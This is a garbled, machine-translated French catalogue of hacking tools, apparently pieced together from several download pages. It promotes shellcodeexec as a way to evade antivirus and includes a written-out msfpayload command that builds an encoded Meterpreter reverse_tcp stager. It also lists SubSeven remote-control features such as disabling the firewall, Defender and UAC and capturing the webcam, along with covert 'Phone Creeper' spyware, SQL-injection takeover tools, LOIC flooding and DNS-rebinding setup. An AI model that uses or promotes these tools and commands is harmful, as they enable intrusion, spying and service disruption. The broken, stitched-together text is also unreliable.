* Linux / Unix / Mac
pygetraep o
* Basée sur le Web
o Les liens de téléchargement de serveurs web: WAMP (Windows) XAMPP (Windows / Linux / Mac / Solaris) et MAMP (Mac)
AnonProxy o *
Flooder o Formulaire FormFlood *
o floodeur Mail
o Miniloader
o Myspace phisher
o Vampire Raep script
Imagerie Raid o
+ Hueg3.jpg
+ Filigranes
+ Goatse
* Moar nouvelle merde
o / i / + Kit Hackerpackage inclus
o Mises à jour générales et beaucoup de merde ajouté.

Les champs marqués d’une * sont nouveaux ou mis à jour dans la version la plus récente.


https: / / / inquisb / shellcodeexec

= Brève description =

shellcodeexec est un petit script à exécuter en mémoire une séquence d’opcodes.

Contexte = =

La plupart des lanceurs shellcode là-bas, y compris la preuve des concepts
partie d’un grand nombre de «sécurité» des livres, des informations sur la façon d’allouer une page mémoire
lecture / écriture / exécutable sur les systèmes POSIX, copiez votre shellcode
et de l’exécuter. Cela fonctionne très bien. Cependant, elle est limitée à POSIX,
ne considère pas nécessairement l’architecture 64-bits et les systèmes Windows.

= Description =

Ce script et les fichiers de projet pertinent (Makefile et Visual Studio
fichiers) vous permettent de compiler l’outil une fois, puis exécutez votre shellcode dans
différentes architectures et systèmes d’exploitation.

En outre, il résout un problème réel monde commun: le système cible anti
logiciel de blocage de virus un stager charge Metasploit-générés (soit EXE
de ELF). Prenez par exemple la ligne de commande suivante:

fenêtres msfpayload $ / Meterpreter / reverse_tcp EXITFUNC processus = LPORT = 4444 = LHOST R | msfencode-a-e x86 x86/shikata_ga_nai-o / tmp / payload.exe-t exe

Cela génère une charge utile stager Metasploit, payload.exe, que dès que
il atterrit sur le système cible AV-protégée est reconnue comme dangereuse et
potentiellement bloqués (selon l’analyse à l’accès des paramètres) par de nombreux
produits anti-virus. Au moment de la rédaction de ce texte, 21 41 anti
virus le détecte comme malveillant – En encodant
plusieurs fois avec msfencode, moins logiciels AV le détecte pas, encore beaucoup.

J’ai été surfer sur le net et j’ai trouvé quelques tutoriaux intéressants et
guides sur les emballages, la compression, obscurcir et l’application de l’IDA-foo
exécutables portables et similaires en vue de réduire le nombre d’AV
produits qui peuvent le détecter comme un fichier malveillant. Cela est d’autant intéressante,
mais ne s’arrête pas quelques durs à mourir virus anti de détecter votre porte dérobée.

Donc la question est, comment serait-il cool d’avoir une solution définitive à éviter
tous ces tracas? C’est exactement là où cet outil entre en jeu!

Caractéristiques = =


* Peut être compilé et fonctionne sur POSIX (Linux / Unix) et les systèmes Windows.

* Peut être compilé et fonctionne sur 32-bit et 64-bit architectures.

* Pour autant que je sache, aucun AV détecter comme malveillants.

* Fonctionne dans DEP / NX-environnements permis: il alloue la page de mémoire où
il stocke les shellcode que + rwx – inscriptibles lisibles et exécutables.

* Il supporte des charges utiles alphanumériques codés: vous pouvez diriger votre codage binaire
shellcode (générés par exemple avec msfpayload Metasploit a) à
msfencode Metasploit pour l’encoder avec l’encodeur alpha_mixed.Réglez le
variable BufferRegister au registre EAX où l’adresse en mémoire de
le shellcode sera conservée, afin d’éviter get_pc () stub binaire à
ajouté au début du shellcode.

* Génère un nouveau thread où le shellcode est exécuté dans une structure
gestionnaire d’exception (SEH) de sorte que si vous envelopper shellcodeexec dans vos propres
exécutable, il évite l’ensemble du processus de collision en cas d’imprévus

SubSeven 2.3 est un simple, facile à utiliser l’outil d’administration à distance (RAT) conçu pour fonctionner sur toutes les plates-formes Windows actuelles, à la fois 32 bits et 64 bits. Cet outil est destiné aux personnes qui veulent que le pouvoir peu plus et le contrôle de gestion informatique à distance. S’il vous plaît utiliser cet outil de façon responsable et lu et j’accepte l’avertissement avant de l’utiliser.Si vous n’êtes pas d’accord avec l’avertissement, s’il vous plaît ne pas utiliser l’outil. Vous acceptez la responsabilité pleine et entière responsabilité de vos actions lors de l’utilisation SubSeven. Ne pas utiliser cet outil sur les ordinateurs que vous n’êtes pas autorisé à contrôler.

Aperçu des caractéristiques

SubSeven.exe (911KB)


– Transfert Vue (upload / download de détails <-> de l’hôte)
– Fenêtre d’affichage (Voir active sur Windows SubSeven)


– Gestionnaire de fichiers (upload / download / run / supprimer / lire des fichiers sur l’hôte)
– Registry Manager (modifier / ajouter / supprimer des entrées de registre sur l’hôte)
– Gestionnaire des services (services de rafraîchissement / installer des services / supprimer des services / gestion de l’hôte distant)
– Process Manager (vue active / tuer les processus actifs de niveau dll)
– Fun Manager (farces général de bureau)


– Ordinateur de bureau (et cliquez sur le bureau de l’hôte distant)
– Webcam (Voir la webcam sur l’hôte distant)
– Audio (capture micro / ligne-dans l’entrée ne l’hôte distant)
GIF – 2.4 ko


– TCP Tunnel (relais ports hôte distant à l’ordinateur local)
– Circulation Viewer (listes connexions réseau actives sur l’hôte distant)
– Réseau navigateur (la liste des partages sur l’hôte distant, permet de cartographier)


– Remote Shell (afficher l’invite de commandes sur l’hôte distant comme s’il était local)
– Mot de passe (récupérer perdu / mots de passe oubliés pour les différents navigateurs, de stockage, les clients de messagerie et messagerie instantanée)
– Installé Apps (liste des applications installées)
– Options du serveur (arrêt / marche / supprimer du serveur sur l’hôte distant)

Construit dans les outils:

– IP statique Notification client (NAS client) (un outil d’écoute qui permet à vos hôtes à distance pour vous avertir quand ils sont en ligne)
– NO-IP compte / IP outil de mise à jour automatique (vous permet d’entrer vos informations de compte NO-IP de mise à jour automatique le site Web des changements de propriété intellectuelle)
– Groupe de raccourci (vous permet d’ajouter vos services préférés en tant que raccourcis
– Indication et exécute Active barre d’état (vous donne des informations utiles)

EditServer.exe (254KB)

L’état du serveur:

– Lire (vous permet de parcourir et lire les paramètres du serveur)
– Les extensions serveur (vous permet de vérifier que l’extension que vous souhaitez le serveur à utiliser)
– Répertoire d’installation (vous permet si vous souhaitez que le serveur doit être installé)
– Serveur de protection (mot de passe vous permet de protéger le serveur)
– Faire fondre le serveur (le serveur permet à disparaître une fois exécuté)
– Attendre le redémarrage (attend à exécuter lors de la réinitialisation suivante)
– Exécuter visibles (permet à l’ordinateur hôte à savoir le serveur est en cours d’exécution)
Nom du serveur (ce qu’il dit) –

Faux messages:

– Activer (actifs de l’option faux message)
– Message icône (vous permet de choisir votre image pour le message)
– Boutons disponibles (sélectionnez les options de l’ordinateur hôte doit presse)
– Titre du message (le texte le titre du message)
– Message texte (le texte du corps du message)
– Test (vous permet de tester le message sur votre PC)

méthodes de démarrage:

– Registre Run (exécuter installe sous clé de registre)
– Registre RunServices (s’installe sous clé de Registre RunServices)
– Registre RunOnce (installe sous clé runonce registre)
– ActiveX (installe dans l’ActiveX chemin de clé)
– Explorer (installe sur l’exécution de Shell de l’explorateur)
– Winlogon (le même que ci-dessus pour winlogon)
– Politiques (exécute sur Windows politiques de démarrage)
– Nom de la clé (keyname pour les entrées de registre Par exemple Remote Server Host.)


– NAS (préciser votre réseau local adresse IP externe ici, ou pour des essais locaux
– CGI / PHP (préciser votre adresse de site Web, par exemple, générer le script et de le transférer à votre php / cgi d’accueil)

Fichiers Bind:

– Sélectionnez un fichier à se lier au serveur. Le fichier binded exécutera avec le serveur – par exemple, vous pouvez exécuter tinyvnc pour la gestion plein écran)

Pare-feu Windows:

– Désactiver le Pare-feu (désactive le pare-feu offre UAC est désactivé)
– Désactiver Win défenseur (désactive Windows Defender)
– Désactiver l’UAC (désactive l’UAC lors de la réinitialisation suivante)


– .dll Load / exe (charger un exe ou dll pour extraire les icônes et les utiliser sur votre serveur.)
– Navigateur (naviguer vers ico.)

Server.exe (58.5KB)

– C’est votre serveur configuré pour déployer sur l’hôte distant.


winAUTOPWN est un auto (hacking) shell gagner outil. Il peut également être utilisé pour tester IDS, IPS et d’autres capteurs de surveillance / logiciels.

Autohack vos cibles avec une interaction moins possible.


* Contient déjà compilés par les exécutables d’exploits célèbres et efficaces alongwith quelques exploits d’origine.
* Pas besoin de déboguer un script ou de compiler le code source.
* Scanne tous les ports 1 -* 65535 après avoir pris l’adresse IP et tente tous les exploits possibles en fonction de la liste des ports ouverts découvert (OpenPorts.TXT)
* PortScan est multi-thread.
* Ne nécessite pas de base de données à l’arrière-end comme les autres
* Peut également être utilisé pour tester l’efficacité de l’IDS / IPS
* Lancé exploits sont indépendants et ne s’appuie pas sur les empreintes de service (pour éviter l’évasion, le cas échéant)

Base de données

DB Audit
DB Audit Expert est une solution professionnelle de base de données d’audit pour Oracle, Sybase, DB2, MySQL et Microsoft SQL Server.DB Audit Expert permet aux administrateurs de bases de données et système, aux administrateurs sécurité, aux auditeurs et aux opérateurs de suivre et d’analyser toute activité de base de données y compris la sécurité de base de données, l’accès et l’utilisation, la création de données, modification ou suppression. Ce qui rend DB Audit vraiment unique est sa prise en charge intégrée de plusieurs méthodes d’audit qui vous donne la possibilité de choisir la meilleure solution pour vos besoins de sécurité de base de données.


– Améliore la sécurité du système et assure la transparence du système. Captures à la fois un accès régulier et «porte arrière» pour les systèmes de base de données vérifiées.
– Caractéristiques de contrôle d’audit centralisé des systèmes de base de données multiples à partir d’un emplacement unique de facilité de gestion.
– Fonctionnalités de l’interface graphique unifiée d’audit, qui réduit la courbe d’apprentissage et est facile à utiliser.
– Fournit des rapports analytiques qui permettent de réduire de grandes quantités de données d’audit à des résumés complets permettant ainsi d’identifier facilement les diverses atteintes à la sécurité de base de données.
– Fournit des rapports d’analyse qui aident à identifier les processus et les utilisateurs sont monopolisant les ressources du système.
– Fournit des détails sur piste de vérification qui ne sont pas disponibles à partir utilitaires natifs d’audit de base de données.
– Offre la possibilité de générer des alertes e-mail en temps réel au personnel clé lorsque surviennent des changements à des données sensibles.
– Libère DBA de la nécessité de créer et gérer des bases de données finement réglé déclenche des fins de vérification des données de changement.
– Prend en charge l’audit des configurations de flexibilité, permettant au personnel de sécurité de choisir des types spécifiques d’opérations de base de données et les modifications de données qui doivent être contrôlées et enregistrées dans la piste d’audit.
– Fournit un système totalement transparent au niveau des données et la vérification du changement de toutes les applications existantes, sans nécessiter de modifications à apporter à ces demandes.
– Compatibilité totale avec tous les hôtes Exploitation des Systèmes sur lesquels les bases de données pris en charge peuvent exécuter, y compris mais non limité à Windows NT, UNIX, Linux, VMS, OS/390, z / OS.

ExploitMyUnion est un outil écrit en Python avec une interface utilisateur PyQt fait pour automatiser l’exploitation par injection SQL.

Havij est un outil automatisé d’injection SQL qui permet aux testeurs de pénétration de trouver et d’exploiter les vulnérabilités d’injection SQL dans une page web.

Il peut profiter d’une application web vulnérable. En utilisant ce logiciel l’utilisateur peut effectuer des empreintes digitales base de données back-end, de récupérer les utilisateurs de SGBD et les mots de passe, tables de vidage et de colonnes, l’extraction de données à partir de la base de données, l’exécution des instructions SQL et même l’accès au système de fichiers sous-jacents et exécuter des commandes sur le système d’exploitation.

La puissance de Havij qui le rend différent des autres outils similaires est de ses méthodes d’injection. Le taux de réussite est supérieur à 95% à injectiong cibles vulnérables en utilisant Havij.

Le convivial GUI (Graphical User Interface) de Havij et les paramètres automatiques et des détections, il est facile à utiliser pour tous, même des utilisateurs amateurs.


1. Bases de données supportées par des méthodes d’injection:
1. MsSQL 2000/2005 avec l’erreur
2. MsSQL 2000/2005 aucune erreur (union fondée)
3. MySQL (base caisse)
4. MySQL aveugles
5. Erreur MySQL base
6. Oracle (base caisse)
7. MsAccess (union fondée)

2. détection automatique des bases
3. détection automatique de type (chaîne ou un entier)
4. détection automatique des mots clés (différence entre trouver la réponse positive et négative)
5. Essayer syntaxes d’injection différents
6. Support de proxy
7. résultat en temps réel
8. Options pour remplacer l’espace par /**/,+,… contre les IDS ou les filtres
9. Évitez d’utiliser des cordes (magic_quotes similaires contourner les filtres)
10 Suspension de l’union illégale
11 Complet en-têtes HTTP variés (comme referer et agent utilisateur)
12 cookie Charger à partir du site pour l’authentification
13 tables de deviner et de colonnes de MySQL 5 <(également à l’aveugle) et MsAccess
14 Fast obtenir des tableaux et des colonnes pour mysql
15 Discussion multi page de recherche d’Admin
16 Discussion multi Online MD5 pirate
17 Mise Informations SGBD
18 Mise en tables, des colonnes et des données
19 executation Command (mssql seulement)
20 fichiers système de lecture (mysql uniquement)
21 INSERT / UPDATE / supprimer des données

Oscanner est un cadre d’évaluation Oracle développé en Java. Il a une architecture à base de plugins et est livré avec un couple de plugins qui n’ont actuellement:

– Dénombrement Sid
– Tests mots de passe (commune et dictionnaire)
– Énumérer Oracle version
– Des rôles de comptes énumérer
– Énumérer les privilèges de compte
– Compte énumérer hachages
– Énumérer les informations d’audit
– Les politiques de mot de passe énumérer
– Les liens de base énumérer

Les résultats sont donnés dans un arbre java graphique.

SFX-SQLI (Sélectionnez Pour XML SQL injection) est une technique d’injection SQL nouvelle qui permet d’extraire toute l’information d’un Microsoft SQL Server 2005/2008 base de données d’une manière extrêmement rapide et efficace.

Cette technique est basée sur la clause FOR XML, qui est capable de convertir le contenu d’un tableau en une chaîne unique, de sorte que son contenu pourrait être ajouté à un domaine injection d’une sous-requête dans une entrée vulnérables d’une application web.

Safe3 Injecteur SQL
Safe3 SQL Injector est un des outils de tests de pénétration le plus puissant qui automatise le processus de détection et d’exploiter des failles d’injection SQL et prise en charge des serveurs de base de données back-end.

eci est une liste des fonctions disponibles:

* Support complet pour GET / Post / Cookie injection
* Prise en charge complète de HTTP de base, Digest, NTLM et authentification de certificats
* Support complet de MySQL, Oracle, PostgreSQL, MSSQL, ACESS, DB2, Sybase, Sqlite
* Prise en charge complète de l’erreur / Union / Blind injection / Force SQL
* Support pour accès du fichier, la commande exécuter, inverse de domaine IP, devinez chemin web, md5 crack, etc
* Dérivation Super WAF


https: / /
Scrawlr, développé par le HP Web Security Research Group, en coordination avec le CSEM, est l’abréviation de SQL Injector et sur chenilles. Scrawlr vont parcourir un site web tout en analysant les paramètres de chaque page Web individuelle pour les vulnérabilités d’injection SQL. Scrawlr est ultra-rapide et utilise notre technologie intelligente du moteur de façon dynamique artisanale attaques par injection SQL à la volée. Il peut même fournir la preuve des résultats positifs en affichant le type de base de données principale en cours d’utilisation et une liste de noms de tables disponibles.

Toolza – SQL Injection outil avec de nombreuses options

Caractéristiques de toolza:
– LFI / Reader / Loade_file () Bruter
– Site de numérisation des dossiers et fichiers
– FTP checker
– FTP Bruter
– Proxy Checker
– Proxy Grabber

Post/Get/Proxy/SOCKS4-5/Cookies/Timeout/Multithread/HTTPS + autorisation pris en charge
– Sélectionnez POST ou GET
– Support pour le proxy (fichier proxy.txt) – avtocheking, en collaboration avec le premier jour ouvrable
– Support pour SOCKS4-5 (fichier socks.txt) – avtocheking, auto-détection chaussettes type (4-5), sans autorisation, en collaboration avec le premier jour ouvrable
– Sélectionnez une connexion timeout
– Capacité à insérer les cookies
– Possibilité de changer l’agent utilisateur
– Possibilité de changer le référent
– Possibilité de sélectionner le protocole HTTP (0 – HTTP/1.0; 1 – HTTP/1.1; par défaut – 1)

Ce script perl permet d’extraire des données de Injections SQL aveugles. Il accepte des requêtes SQL en tant que paramètre de ligne de commande et il fonctionne à la fois entier et chaîne basée injections. Bases de données supportées:


1. MySQL

2. PostgreSQL

3. Oracle

L’outil prend en charge 8 modes d’attaque (de type interrupteur): –
Type 0: Injection SQL aveugles en fonction des conditions vrai et le faux renvoyées par le serveur back-end

Type 1: Injection SQL Blind fondée sur l’erreur et vrai (par exemple, erreur de syntaxe) renvoyées par le serveur back-end.

Type 2: Injection SQL aveugles « ordre » et de « group by ».

Type 3: extraction de données avec les privilèges SYS (dbms_export_extension ORACLE exploiter)

Type 4: l’exécution de code OS (dbms_export_extension ORACLE exploiter)

Type 5: est la lecture de fichiers (dbms_export_extension ORACLE exploit, basé sur Java)

Type 6: OS est l’exécution de code DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploiter

Type 7: OS est l’exécution de code SYS.KUPP $ PROC.CREATE_MASTER_PROCESS (), DBA privs

Cmd = revshell-Type 7 prend en charge l’exécution de charge utile Meterpreter, exécutez generator.exe premier

Type 8: est DBMS_JAVA_TEST.FUNCALL OS exécution de code, avec des autorisations d’E / S JAVA

Cmd-revshell = Type 8 prend en charge l’exécution de charge utile Meterpreter, exécutez generator.exe premier

Hexjector est un Opensource, multi-plate-forme PHP script pour automatiser site pentest pour SQL Injection vulnérabilités.

sqlmap est un logiciel libre de ligne de commande automatique de l’outil d’injection SQL. Son objectif est de détecter et de tirer parti des vulnérabilités d’injection SQL dans les applications web. Une fois qu’il détecte une ou plusieurs injections SQL sur la machine cible, l’utilisateur peut choisir parmi une variété d’options pour effectuer une vaste base de données back-end de gestion des empreintes digitales du système, récupérer des SGBD utilisateur de la session et la base de données, les utilisateurs énumérer, les mots de passe, privilèges, bases de données , vidage utilisateur spécifié entier ou les tables du SGBD / colonnes, diriger sa propre instruction SQL, lire ou écrire du texte ou des fichiers binaires sur le système de fichiers, d’exécuter des commandes arbitraires sur le système d’exploitation, établir un out-of-band connexion « stateful » entre l’agresseur boîte et le serveur de base de données via stager charge Metasploit, base de données d’exploitation enregistrées débordement de tampon ou de procédure attaque de relais SMB et plus.

qlninja est un outil d’exploiter les vulnérabilités d’injection SQL sur une application web qui utilise Microsoft SQL Server comme back-end. Son principal objectif est de fournir un accès interactif sur le serveur vulnérable DB, même dans un environnement très hostile.Elle doit être utilisée par les testeurs de pénétration d’aider et d’automatiser le processus de prise en charge d’un serveur de DB quand une faille d’injection SQL a été découvert.


D’empreintes digitales * du serveur distant SQL (version, l’utilisateur effectuant les requêtes, les privilèges des utilisateurs, la disponibilité xp_cmdshell, mode d’authentification DB)
‘Sa’ force brute * du mot de passe (en 2 versions: un dictionnaire et incrémentales)
* Elévation de privilèges au groupe sysadmin si le mot de passe ‘sa’ a été trouvé
* Création d’un xp_cmdshell personnalisé si l’original a été supprimé
* Upload de netcat (ou tout autre exécutable) en utilisant uniquement les requêtes HTTP normales (pas de FTP / TFTP nécessaire)
* TCP / UDP scan de la cible SQL Server à la machine d’attaque, afin de trouver un port qui est autorisé par le pare-feu du réseau cible et l’utiliser pour une coque arrière
* Bindshell directe et inverse, à la fois TCP et UDP
* DNS-tunnel pseudo-shell, en l’absence de ports TCP / UDP sont disponibles pour un direct / shell inverse, mais le serveur peut résoudre les noms d’hôtes DB externes
* Techniques d’évasion pour confondre un peu IDS / IPS / FAT
* Intégration avec Metasploit3, pour obtenir un accès graphique sur le serveur distant par le biais d’une injection DB serveur VNC

Ngouma est un outil de test de pénétration entièrement écrit en python. Le cadre comprend des modules pour découvrir les hôtes, recueillir des informations sur, les objectifs de fuzz, brute noms d’utilisateur et mots de passe vigueur et, bien sûr, des exploits.

Bien que les capacités d’exploitation actuels dans Inguma peut être limitée, ce programme offre de nombreux outils de collecte d’informations et d’audit cible. Inguma est encore très développée donc n’oubliez pas de rester à jour et vérifier à nouveau pour de nouvelles et mises à jour.


(OAT) OCS Outil d’évaluation
OAT est une solution Open Source de sécurité outil conçu pour vérifier la force du mot de passe d’utilisateurs de Microsoft Office Communication Server. Après un mot de passe est compromise, OAT démontre le potentiel des attaques UC qui peuvent être effectuées par des utilisateurs légitimes si les contrôles de sécurité appropriées ne sont pas en place.

Le premier réseau de distribution d’audit pour le téléphone portable sorti.

Le NeoPwn Mobile Pentesting projet est fière d’annoncer qu’elle fusionne avec BackTrack, pour produire le tout premier BackTrack Mobile suite!

Téléphone Creeper
Téléphone Creeper est une suite d’espionnage téléphonique, il peut être installé silencieusement en insérant une carte SD avec les fichiers ci-dessous à ce sujet.
Le programme ne se présente pas au titre des programmes installés ou les programmes en cours et permet un large utiles ou de fonctionnalités. Téléphones exécution de ce logiciel peut être commandé à distance par SMS. Toutes les commandes seront automatiquement reçus et supprimés immédiatement et les résultats seront publiés à l’expéditeur.
Pré-configuré les paramètres peuvent être ajoutés à l’installateur d’avoir votre mot de passe par défaut et votre numéro de téléphone pour recevoir des mises à jour en direct. Par défaut, ce programme en mode silencieux se réinstaller, même après une réinitialisation matérielle, si la carte mémoire avec ces fichiers est encore dans le dispositif.  »


FireCat (Catalogue de l’extension Firefox de vérification) est une collection mindmap des extensions firefox le plus efficace et utile d’audit de sécurité axée sur l’application et l’évaluation. FireCat n’est pas un replacement des utilitaires de sécurité et d’autres logiciels, ainsi que fuzzers, les mandataires et les vulnérabilités des applications scanners.

Peach est une SmartFuzzer qui est capable de réaliser la production et le fuzzing mutation base.

Peach nécessite la création de fichiers Peachpit qui définissent la structure, des informations de type, et les relations dans les données à fuzzed. Il permet en outre de la configuration d’une course fuzzing, y compris la sélection d’un transport de données (Editeur), l’exploitation forestière interface, etc


https: / /
Scapy est un puissant outil interactif de manipulation de paquets, générateur de paquet, scanner réseau, outil de découverte du réseau, et renifleur de paquets. Il fournit les classes pour la création interactive de paquets ou des ensembles de paquets, de les manipuler, de les envoyer sur le fil, sniff autres paquets de fil, faire correspondre les réponses et les réponses, et plus encore.L’interaction est fourni par l’interpréteur Python, donc les structures de programmation Python peuvent être utilisés (tels que les variables, les boucles et les fonctions). Rapport modules sont possibles et faciles à faire. Il est destiné à faire les mêmes choses que ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, Firewalk, irpas, tethereal, tcpdump, etc

SpiderLab Outils

https: / / / SpiderLabs-tools.php
SpiderLabs a développé des dizaines d’outils au fil des ans. La plupart d’entre eux finissent comme des outils internes que depuis ils ont fini par faire leur chemin dans l’une des offres de produits de Trustwave.

hping est une ligne de commande orientée TCP / assembleur de paquets IP / analyseur. L’interface est inspirée à la commande ping (8) commande unix, mais hping est non seulement capable d’envoyer des demandes d’écho ICMP. Il supporte le protocole TCP, UDP, ICMP et IP-RAW, a un mode de traceroute, la capacité d’envoyer des fichiers entre un canal couvert, et de nombreuses autres fonctionnalités.

Bien que hping a été principalement utilisé comme un outil de sécurité dans le passé, il peut être utilisé de plusieurs façons par des gens qui ne se soucient pas de sécurité pour tester les réseaux et les hôtes. Un sous-ensemble des choses que vous pouvez faire en utilisant hping:

* Les épreuves de pare-feu
* Port avancé de numérisation
* Pour tester un réseau, en utilisant des protocoles différents, TOS, la fragmentation
* Manuel découverte MTU du chemin
* Advanced traceroute, sous tous les protocoles pris en charge
* Distance OS fingerprinting
disponibilité à distance * deviner
* TCP / IP de vérification des piles
hping * peut aussi être utile aux étudiants qui apprennent le protocole TCP / IP.

PenTBox est une suite de sécurité qui emballe beaucoup de sécurité et la stabilité des tests des programmes axés sur des réseaux et des systèmes.
Par exemple, la suite a Honeypot, TCP Flood Déni de Service outils de test, Secure Instant Messaging, Port Scanner, Fuzzer, mots de passe sécurisé générateur et plus.
Tous les programmes sont en cours d’élaboration par PenTBox équipe et les contributeurs de la communauté du logiciel libre au projet.
Programmé en Ruby, et orientée vers les systèmes GNU / Linux (mais compatible avec Windows, MacOS et plus).
Il est libre, sous licence GNU/GPLv3.


6tunnel vous permet d’utiliser les services fournis par les hôtes IPv6 avec des applications IPv4 et vice-versa. Il peut se lier à n’importe lequel de vos IPv4 (par défaut) ou des adresses IPv6 et de transmettre toutes les données pour IPv4 ou IPv6 (par défaut) d’accueil.

Couche application DDoS Simulator

ddosim est un outil qui peut être utilisé dans un environnement de laboratoire pour simuler un déni de service distribué (DDOS) contre un serveur cible. Le test montre la capacité du serveur pour gérer les applications spécifiques des attaques DDOS. ddosim simule plusieurs hôtes zombie (ayant des adresses IP aléatoires) qui créent plein les connexions TCP vers le serveur cible. Après avoir terminé la connexion, ddosim commence la conversation avec l’application d’écoute (par exemple, le serveur HTTP).

ddosim est écrit en C + + et fonctionne sur Linux. Ses fonctionnalités actuelles comprennent:

* DDoS HTTP avec des demandes valides
* DDoS HTTP de requêtes non valides (semblable à un DC + + attaque)
inondations * connexion TCP sur le port aléatoire

Echo Mirage
Echo Mirage est un proxy réseau générique. Il utilise l’injection de DLL et techniques des fonctions d’accrochage pour rediriger les appels de fonction réseau connexes afin que les données transmises et reçues par des applications locales peuvent être observées et modifiés.

fonctions de chiffrement Windows et OpenSSL sont également accrochés de telle sorte que le texte brut de données envoyées et reçues au cours d’une session cryptée est également disponible.

Le trafic peut être intercepté en temps réel, ou manipulés avec des expressions régulières et des scripts d’action

Cannon ions de basse orbite
Orbite basse Ion Cannon (Loïc) est un programme open source écrit en McDonald’s Visual C # environnement de codage. Il est utilisé pour DDoSing sites Web et les tests de sécurité du serveur.

LOIC (orbite basse Ion Cannon) est une application de test de réseau stress, écrit en C # et développé par « praetox ». Il tente une attaque par déni de service sur le site cible par les inondations le serveur avec des paquets TCP, les paquets UDP, ou des demandes HTTP avec l’intention de perturber le service d’un hôte particulier. Le programme a été exploitée au cours du projet Chanology à attaquer des sites Web de Scientologie, et est actuellement utilisé par l’opération Avenge Assange (organisée par l’opération de récupération) pour attaquer les sites Internet des entreprises et des organisations qui se sont opposés à Wikileaks

Mausezahn est un générateur de trafic rapide gratuit écrit en C qui vous permet d’envoyer presque tous les paquets possibles et impossibles. Il est principalement utilisé pour tester les réseaux VoIP ou multicast, mais aussi pour des audits de sécurité pour vérifier si vos systèmes sont durcies suffisant pour des attaques spécifiques.
Mausezahn peut être utilisé par exemple:

* Comme générateur de trafic (par exemple, à souligner les réseaux multicast)
* Pour mesurer précisément la gigue (variations de retard) entre deux hôtes (par exemple la vérification VoIP-SLA)
* Comme outil didactique lors d’une conférence de transmission de données ou pour exercices pratiques
* Pour les tests de pénétration de firewalls et les IDS
* Pour les attaques DoS sur les réseaux (aux fins de vérification bien sûr)
* Pour trouver des bogues dans le logiciel de réseau ou les appareils
* Pour les attaques de reconnaissance l’aide de balayages ping et les scans de ports
* Pour tester le comportement du réseau dans des circonstances étranges (stress test, paquets malformés, …)

… Et plus encore. Mausezahn est fondamentalement un outil polyvalent paquet création sur la ligne de commande avec une syntaxe simple et une aide contextuelle. Il pourrait également être utilisé dans (bash-) des scripts pour effectuer une combinaison de tests. Soit dit en passant, Mausezahn est assez rapide, quand a commencé sur mon vieux PIII-portable (1,4 GHz, Gigabit Ethernet), j’ai mesuré 755 Mbit / s en utilisant les compteurs de paquets d’une interface HP ProCurve 5400 commutateur.

TCP État Epuisement d’essai Avec Network Attendez – Les vulnérabilités Naptha sont un type de vulnérabilités de déni de service et documentés par Bob Keyes, de l’équipe BindView rasoir de sécurité en 2000. Les vulnérabilités existent dans certaines implémentations du protocole TCP, en particulier dans la façon dont certaines implémentations TCP garder une trace de l’état des connexions TCP, et permettre à un attaquant d’épuiser les ressources d’un système attaqué sans utiliser beaucoup de ressources sur le système utilisé pour lancer l’attaque.

Le moteur OpenDPI, publié sous la licence LGPL, diffère de commerciaux ipoque de moteur d’analyse dans son matériel DPI à prix élevé. La version open-source est beaucoup plus lent et (plus important) ne révèle pas de méthodes pour identifier ipoque transmissions cryptées. DPI vendeurs prétendent tous niveaux élevés de succès à identifier ce trafic sur la base des modèles d’écoulement et les signatures poignée de main à des protocoles communs tels que BitTorrent et Skype, même si elles ne peuvent pas casser le cryptage et d’examiner le contenu de ces transmissions.

Pylore est un outil pour tester la vulnérabilité d’un serveur Web à une classe particulière de déni de service (DoS). Il utilise la méthode Slowloris; en utilisant toutes les connexions disponibles, les serveurs Web ne peut pas traiter les demandes valables.

Pylore est un outil de script pour tester la vulnérabilité d’un serveur Web à un déni de service (DoS) qui supporte SOCKS, SSL, et toutes les méthodes de requête HTTP. Il utilise la méthode Slowloris.

QuickRecon est un outil d’information simple rassemblement qui vous permet de:

* Sous-domaines Bruteforce d’un domaine cible
* Effectuer le transfert de zone
* Les adresses email Recueillir de et
* Trouver les relations humaines en utilisant XHTML Friends Network (microformats)

RawCap est un renifleur de commande en ligne gratuit de réseau pour Windows qui utilise des sockets bruts.

Propriétés de RawCap:

Peut sniff toute interface qui a obtenu une adresse IP, y compris (localhost / loopback)
RawCap.exe est à seulement 17 kB
Aucune bibliothèque externe ou DLL nécessaires autres que. NET Framework 2.0
Aucune installation n’est nécessaire, il suffit de télécharger et RawCap.exe sniff
Peut sniff la plupart des types d’interface, y compris les interfaces WiFi et PPP
le minimum de mémoire et de la charge CPU
Fiable et simple d’utilisation


Vous devez disposer de privilèges d’administrateur pour exécuter RawCap.

Relier est un outil de DNS reconsolidation, qui implémente les multiples attaques « A » DNS record reconsolidation. Il vous permet un accès interne d’un routeur cible interface Web! La meilleure partie est l’administration à distance n’a pas besoin d’être activé pour que cette attaque fonctionne! Tout ce qui est nécessaire est que l’utilisateur à l’intérieur du réseau cible surfer sur un site Web qui est contrôlée, ou a été compromise, par vous. Vous pouvez éventuellement utiliser des astuces d’ingénierie sociale pour inciter un utilisateur à visiter ce site web. Il ne nécessite aucune connaissance préalable du routeur cible ou les paramètres de configuration du routeur comme marque, le modèle, l’adresse IP, nom d’hôte, etc, et ne pas utiliser un anti-DNS pinning techniques. Relier intègre un serveur DNS, deux serveurs Web et un serveur proxy HTTP dans un seul binaire Linux.

DNS reliaison

Maintenant, comment voulez-vous le faire fonctionner. Dans les mots des auteurs –
« En fait, vous devez configurer votre nom de domaine à utiliser Rebind que votre serveur DNS primaire. Cela se fait en deux étapes: d’abord, vous devez vous enregistrer la machine que vous avez l’intention d’exécuter des Rebind comme un serveur de noms, alors vous devez configurer votre domaine pour utiliser ce serveur de nom.La plupart des bureaux d’enregistrement vous permettra d’effectuer ces deux actions, bien que certains ne sont pas et de nombreux, il est difficile de trouver ces paramètres, de sorte que vous pourriez avoir à chercher un peu.

Aller à la registraire, où vous avez enregistré votre nom de domaine (Host-Unlimited, GoDaddy, Yahoo, etc) et le premier enregistrement de deux serveurs de noms. Vous souhaitez vous inscrire deux parce que la plupart des bureaux d’enregistrement aura besoin de votre domaine d’avoir au moins deux serveurs de noms, et que vous voulez relier à traiter toutes les requêtes DNS. Nom du serveur de noms ns1 et ns2 et définir leurs adresses IP à celle de la machine d’où vous avez l’intention d’exécuter Rebind.

